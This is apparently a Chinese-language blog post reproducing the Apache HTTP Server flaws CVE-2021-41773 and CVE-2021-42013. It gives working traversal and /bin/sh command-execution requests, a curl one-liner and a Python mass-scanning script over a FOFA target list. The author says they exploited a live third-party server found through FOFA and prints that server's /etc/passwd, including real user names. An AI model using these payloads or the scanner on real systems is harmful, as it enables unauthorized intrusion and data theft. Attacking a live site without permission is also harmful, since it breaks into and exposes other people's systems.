漏洞復現
- CVE-2021-41773
- 漏洞描述
- 影響版本
- fofa語法
- POC
- YOU漏洞的Url
- 漏洞測驗
- CVE-2021-42013
- 漏洞描述
- 影響版本
- POC
- 漏洞測驗
本來想著8點多了休息一下,結果老板發資訊說復現一下漏洞,那我就整一下吧,前幾天電腦壞了之后里面東西丟了,虛擬機搭建的漏洞復現環境也沒有了,所以只能FOFA找個網站直接干了,
https://pastebin.com/DHpCNz9n
目錄穿越檔案讀取漏洞只影響2.4.49,2.4.50不完全修復可繞過,如果開啟mod_cgi可RCE
CVE-2021-41773
Apache HTTP Server路徑遍歷
漏洞描述
在 Apache HTTP Server 2.4.49 中對路徑規范化所做的更改中發現了一個缺陷,攻擊者可以使用路徑遍歷攻擊將 URL 映射到預期檔案根目錄之外的檔案,如果檔案根目錄之外的檔案不受“要求全部拒絕”的保護,則這些請求可能會成功,此外,此缺陷可能會泄漏 CGI 腳本等解釋檔案的來源,已知此問題已被廣泛利用,此問題僅影響 Apache 2.4.49 而不是早期版本,
影響版本
- Apache HTTP Server 2.4.49
fofa語法
server="Apache/2.4.49"
POC
GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 127.0.0.1:8080
單個URL的POC
curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
批量檢測POC
import urllib.request
import ssl
from colorama import init
#添加Headers資訊
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36',
}
for ip in open('server=Apache2.4.49.txt','r'):
ipv = ip.strip('\r\n')
url = f'{ipv}/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
#防止ssl報錯
context = ssl._create_unverified_context()
try:
re = urllib.request.Request(url=url,headers=headers)
response = urllib.request.urlopen(re,context=context,timeout=3)
response = response.read().decode('utf-8')
if "root:x:" in str(response):
print(f"\033[0;31m{url}\033[0m 可能存在漏洞")
with open('vul.txt','a',encoding='utf-8') as f:
f.write(ipv+"\r")
else:
print(f"{ipv}不存在漏洞")
except Exception as w:
print(f"{ipv}不存在漏洞")
YOU漏洞的Url
https://X.X.X.X/etc/passwd
網站是個國外的Ubuntu-Apache2.4.49搭建的
漏洞測驗
請求包
GET https://X.X.X.X//icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 0
回應包
Connection: close
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
admin:x:1000:1000:,,,:/home/admin:/bin/bash
mysql:x:111:115:MySQL Server,,,:/nonexistent:/bin/false
sandi:x:1001:1001:Sandi Molinari,,,:/home/sandi:/bin/bash
tims:x:1002:1002:TIMS,,,:/home/tims:/bin/bash
newtims:x:1003:1003:New TIMS,,,:/home/newtims:/bin/bash
目錄穿越
CVE-2021-42013
Apache HTTP Server遠程代碼執行
漏洞描述
Apache HTTP Server 2.4.50 中對 CVE-2021-41773 的修復不夠充分,攻擊者可以使用路徑遍歷攻擊將 URL 映射到由類似別名的指令配置的目錄之外的檔案,如果這些目錄之外的檔案不受通常的默認配置 “要求全部拒絕” 的保護,則這些請求可能會成功,如果還為這些別名路徑啟用了 CGI 腳本,則可以允許遠程代碼執行,
CGI(Common Gateway Interface)公共網關介面,是外部擴展應用程式與 Web 服務器互動的一個標準介面,是為提供網路服務而執行控制臺應用 (或稱命令列界面)的程式,提供于服務器上實作動態網頁的通用協議,
影響版本
若Apache HTTPd開啟了cgi支持,攻擊者可構造惡意請求執行命令,控制服務器,
- Apache HTTP Server 2.4.49
- Apache HTTP Server 2.4.50
POC
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
Content-Type: text/plain
Content-Length: 8
echo; id
漏洞測驗
FOFA找了好多都沒有開啟Apache-cgi的網站,所以在靶場中測驗了一下,
GET http://X.X.X.X:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: X.X.X.X:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
If-None-Match: "29cd-5cde5771ac040-gzip"
If-Modified-Since: Sat, 09 Oct 2021 06:18:33 GMT
Connection: close
Content-Length: 43
echo Content-Type: text/plain; echo; 命令
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/356911.html
標籤:其他